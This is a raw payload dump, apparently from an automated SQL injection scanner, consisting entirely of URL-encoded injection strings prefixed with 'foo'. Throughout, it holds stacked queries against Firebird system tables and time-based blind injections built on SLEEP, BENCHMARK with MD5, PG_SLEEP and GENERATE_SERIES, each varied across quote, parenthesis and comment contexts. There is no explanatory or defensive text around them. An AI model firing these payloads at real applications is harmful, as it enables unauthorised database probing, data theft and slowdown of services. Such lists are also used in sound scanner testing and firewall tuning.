foo%27%7C%7C%28SELECT%20%27FeSB%27%20WHERE%209000%3D9000%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%2B%28SELECT%20QQbM%20WHERE%204051%3D4051%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%2B%28SELECT%20%27MUwF%27%20WHERE%204615%3D4615%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- foo%29%20AND%20SLEEP%285%29 foo%27%29%20AND%20SLEEP%285%29 foo%27%20AND%20SLEEP%285%29 foo%22%20AND%20SLEEP%285%29 foo%29%20AND%20SLEEP%285%29%20AND%20%283860%3D3860 foo%29%29%20AND%20SLEEP%285%29%20AND%20%28%282960%3D2960 foo%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%286813%3D6813 foo%20AND%20SLEEP%285%29 foo%27%29%20AND%20SLEEP%285%29%20AND%20%28%27dgfV%27%3D%27dgfV foo%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27Jjtu%27%3D%27Jjtu foo%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27JXeK%27%3D%27JXeK foo%27%20AND%20SLEEP%285%29%20AND%20%27zjcr%27%3D%27zjcr foo%27%29%20AND%20SLEEP%285%29%20AND%20%28%27AYjx%27%20LIKE%20%27AYjx foo%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27YRYN%27%20LIKE%20%27YRYN foo%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27lwkC%27%20LIKE%20%27lwkC foo%27%20AND%20SLEEP%285%29%20AND%20%27yXTA%27%20LIKE%20%27yXTA foo%22%29%20AND%20SLEEP%285%29%20AND%20%28%22nUZK%22%3D%22nUZK foo%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22pEcl%22%3D%22pEcl foo%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22VKKg%22%3D%22VKKg foo%22%20AND%20SLEEP%285%29%20AND%20%22hbVu%22%3D%22hbVu foo%22%29%20AND%20SLEEP%285%29%20AND%20%28%22ysGj%22%20LIKE%20%22ysGj foo%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22UNtP%22%20LIKE%20%22UNtP foo%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22ubuM%22%20LIKE%20%22ubuM foo%22%20AND%20SLEEP%285%29%20AND%20%22WYAv%22%20LIKE%20%22WYAv foo%25%27%29%20AND%20SLEEP%285%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%20SLEEP%285%29%20AND%20%28%27iKSF%27%3D%27iKSF foo%00%27%20AND%20SLEEP%285%29%20AND%20%27DLOo%27%3D%27DLOo foo%27%29%20WHERE%209339%3D9339%20AND%20SLEEP%285%29%20--%20 foo%22%29%20WHERE%208979%3D8979%20AND%20SLEEP%285%29%20--%20 foo%29%20WHERE%208663%3D8663%20AND%20SLEEP%285%29%20--%20 foo%27%20WHERE%206804%3D6804%20AND%20SLEEP%285%29%20--%20 foo%22%20WHERE%206058%3D6058%20AND%20SLEEP%285%29%20--%20 foo%20WHERE%208741%3D8741%20AND%20SLEEP%285%29%20--%20 foo%27%7C%7C%28SELECT%20%27Nezj%27%20FROM%20DUAL%20WHERE%203601%3D3601%20AND%20SLEEP%285%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27LIPy%27%20WHERE%203984%3D3984%20AND%20SLEEP%285%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20bLsW%20WHERE%202149%3D2149%20AND%20SLEEP%285%29%20%29%2B%27 foo%27%2B%28SELECT%20%27rtrX%27%20WHERE%204202%3D4202%20AND%20SLEEP%285%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 foo%29%20AND%20SLEEP%285%29%23 foo%27%29%20AND%20SLEEP%285%29%23 foo%27%20AND%20SLEEP%285%29%23 foo%22%20AND%20SLEEP%285%29%23 foo%29%20AND%20SLEEP%285%29%23 foo%29%29%20AND%20SLEEP%285%29%23 foo%29%29%29%20AND%20SLEEP%285%29%23 foo%20AND%20SLEEP%285%29%23 foo%27%29%20AND%20SLEEP%285%29%23 foo%27%29%29%20AND%20SLEEP%285%29%23 foo%27%29%29%29%20AND%20SLEEP%285%29%23 foo%27%20AND%20SLEEP%285%29%23 foo%27%29%20AND%20SLEEP%285%29%23 foo%27%29%29%20AND%20SLEEP%285%29%23 foo%27%29%29%29%20AND%20SLEEP%285%29%23 foo%27%20AND%20SLEEP%285%29%23 foo%22%29%20AND%20SLEEP%285%29%23 foo%22%29%29%20AND%20SLEEP%285%29%23 foo%22%29%29%29%20AND%20SLEEP%285%29%23 foo%22%20AND%20SLEEP%285%29%23 foo%22%29%20AND%20SLEEP%285%29%23 foo%22%29%29%20AND%20SLEEP%285%29%23 foo%22%29%29%29%20AND%20SLEEP%285%29%23 foo%22%20AND%20SLEEP%285%29%23 foo%25%27%29%20AND%20SLEEP%285%29%23 foo%25%27%29%29%20AND%20SLEEP%285%29%23 foo%25%27%29%29%29%20AND%20SLEEP%285%29%23 foo%25%27%20AND%20SLEEP%285%29%23 foo%00%27%29%20AND%20SLEEP%285%29%23 foo%00%27%20AND%20SLEEP%285%29%23 foo%27%29%20WHERE%208089%3D8089%20AND%20SLEEP%285%29%23 foo%22%29%20WHERE%206602%3D6602%20AND%20SLEEP%285%29%23 foo%29%20WHERE%209985%3D9985%20AND%20SLEEP%285%29%23 foo%27%20WHERE%205849%3D5849%20AND%20SLEEP%285%29%23 foo%22%20WHERE%204381%3D4381%20AND%20SLEEP%285%29%23 foo%20WHERE%203293%3D3293%20AND%20SLEEP%285%29%23 foo%27%7C%7C%28SELECT%20%27OZXG%27%20FROM%20DUAL%20WHERE%206641%3D6641%20AND%20SLEEP%285%29%23 foo%27%7C%7C%28SELECT%20%27Elox%27%20WHERE%201370%3D1370%20AND%20SLEEP%285%29%23 foo%27%2B%28SELECT%20NkKS%20WHERE%201908%3D1908%20AND%20SLEEP%285%29%23 foo%27%2B%28SELECT%20%27iwYY%27%20WHERE%208318%3D8318%20AND%20SLEEP%285%29%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23 foo%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29 foo%27%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29 foo%27%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29 foo%22%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29 foo%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%288444%3D8444 foo%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%283183%3D3183 foo%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%287118%3D7118 foo%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29 foo%27%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%27JEpJ%27%3D%27JEpJ foo%27%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%27QnCC%27%3D%27QnCC foo%27%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%28%27IxTV%27%3D%27IxTV foo%27%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%27eZPP%27%3D%27eZPP foo%27%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%27PPQt%27%20LIKE%20%27PPQt foo%27%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%27yeme%27%20LIKE%20%27yeme foo%27%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%28%27kRBc%27%20LIKE%20%27kRBc foo%27%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%27KJiJ%27%20LIKE%20%27KJiJ foo%22%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%22gJFQ%22%3D%22gJFQ foo%22%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%22kXeB%22%3D%22kXeB foo%22%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%28%22dsCe%22%3D%22dsCe foo%22%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%22KqqN%22%3D%22KqqN foo%22%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%22FiKO%22%20LIKE%20%22FiKO foo%22%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%22nZrQ%22%20LIKE%20%22nZrQ foo%22%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%28%22KcSn%22%20LIKE%20%22KcSn foo%22%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%22Kzxy%22%20LIKE%20%22Kzxy foo%25%27%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%28%27jEJj%27%3D%27jEJj foo%00%27%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20AND%20%27SEAa%27%3D%27SEAa foo%27%29%20WHERE%207244%3D7244%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%22%29%20WHERE%206940%3D6940%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%29%20WHERE%202598%3D2598%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%27%20WHERE%209321%3D9321%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%22%20WHERE%208673%3D8673%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%20WHERE%207080%3D7080%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27oRvr%27%20FROM%20DUAL%20WHERE%205493%3D5493%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27lDnS%27%20WHERE%206611%3D6611%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20Vfut%20WHERE%204924%3D4924%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27uVEY%27%20WHERE%202880%3D2880%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208327%3DBENCHMARK%285000000%2CMD5%280x776f514c%29%29%20%23 foo%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%25%27%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%25%27%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%25%27%29%29%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%25%27%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%00%27%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%00%27%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%29%20WHERE%208604%3D8604%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%29%20WHERE%204918%3D4918%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%29%20WHERE%206106%3D6106%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%20WHERE%201632%3D1632%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%22%20WHERE%204132%3D4132%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%20WHERE%207242%3D7242%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%7C%7C%28SELECT%20%27jMjJ%27%20FROM%20DUAL%20WHERE%207239%3D7239%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%7C%7C%28SELECT%20%27nFCu%27%20WHERE%202690%3D2690%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%2B%28SELECT%20GvMk%20WHERE%203765%3D3765%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%2B%28SELECT%20%27XMVG%27%20WHERE%209233%3D9233%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209946%3DBENCHMARK%285000000%2CMD5%280x6b425766%29%29%23 foo%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29 foo%27%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29 foo%27%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29 foo%22%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29 foo%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%284342%3D4342 foo%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%284456%3D4456 foo%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%284056%3D4056 foo%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29 foo%27%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27wOaF%27%3D%27wOaF foo%27%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27pRyy%27%3D%27pRyy foo%27%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27Frag%27%3D%27Frag foo%27%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%27xYSz%27%3D%27xYSz foo%27%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27tbmC%27%20LIKE%20%27tbmC foo%27%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27dXdA%27%20LIKE%20%27dXdA foo%27%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27oBFz%27%20LIKE%20%27oBFz foo%27%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%27fbOT%27%20LIKE%20%27fbOT foo%22%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22yyha%22%3D%22yyha foo%22%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22kmYb%22%3D%22kmYb foo%22%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22hGeE%22%3D%22hGeE foo%22%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%22ISYv%22%3D%22ISYv foo%22%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22BBtS%22%20LIKE%20%22BBtS foo%22%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22Mzzm%22%20LIKE%20%22Mzzm foo%22%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22eZEs%22%20LIKE%20%22eZEs foo%22%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%22levK%22%20LIKE%20%22levK foo%25%27%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27Yamx%27%3D%27Yamx foo%00%27%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20AND%20%27jSJo%27%3D%27jSJo foo%27%29%20WHERE%205373%3D5373%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%22%29%20WHERE%201937%3D1937%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%29%20WHERE%206800%3D6800%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%27%20WHERE%205291%3D5291%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%22%20WHERE%209887%3D9887%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%20WHERE%208129%3D8129%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27mkxN%27%20FROM%20DUAL%20WHERE%201907%3D1907%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27tXJX%27%20WHERE%206757%3D6757%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20EARr%20WHERE%207206%3D7206%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27LjIP%27%20WHERE%208543%3D8543%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201286%3D%28SELECT%201286%20FROM%20PG_SLEEP%285%29%29%20%23 foo%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%25%27%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%25%27%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%25%27%29%29%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%25%27%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%00%27%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%00%27%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20WHERE%209469%3D9469%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%29%20WHERE%207442%3D7442%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%29%20WHERE%204427%3D4427%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%20WHERE%202770%3D2770%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%22%20WHERE%201860%3D1860%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%20WHERE%207087%3D7087%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%7C%7C%28SELECT%20%27pAcZ%27%20FROM%20DUAL%20WHERE%202780%3D2780%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%7C%7C%28SELECT%20%27HxGm%27%20WHERE%206803%3D6803%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%2B%28SELECT%20bUQN%20WHERE%208474%3D8474%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%2B%28SELECT%20%27Adtj%27%20WHERE%201342%3D1342%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209036%3D%28SELECT%209036%20FROM%20PG_SLEEP%285%29%29-- foo%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%22%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%287230%3D7230 foo%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%282579%3D2579 foo%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%284714%3D4714 foo%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27dFaF%27%3D%27dFaF foo%27%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27ofts%27%3D%27ofts foo%27%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27VPGU%27%3D%27VPGU foo%27%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27MBop%27%3D%27MBop foo%27%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27SbCF%27%20LIKE%20%27SbCF foo%27%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27eOMn%27%20LIKE%20%27eOMn foo%27%29%29%29%20AND%204426%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27loUM%27%20LIKE%20%27loUM 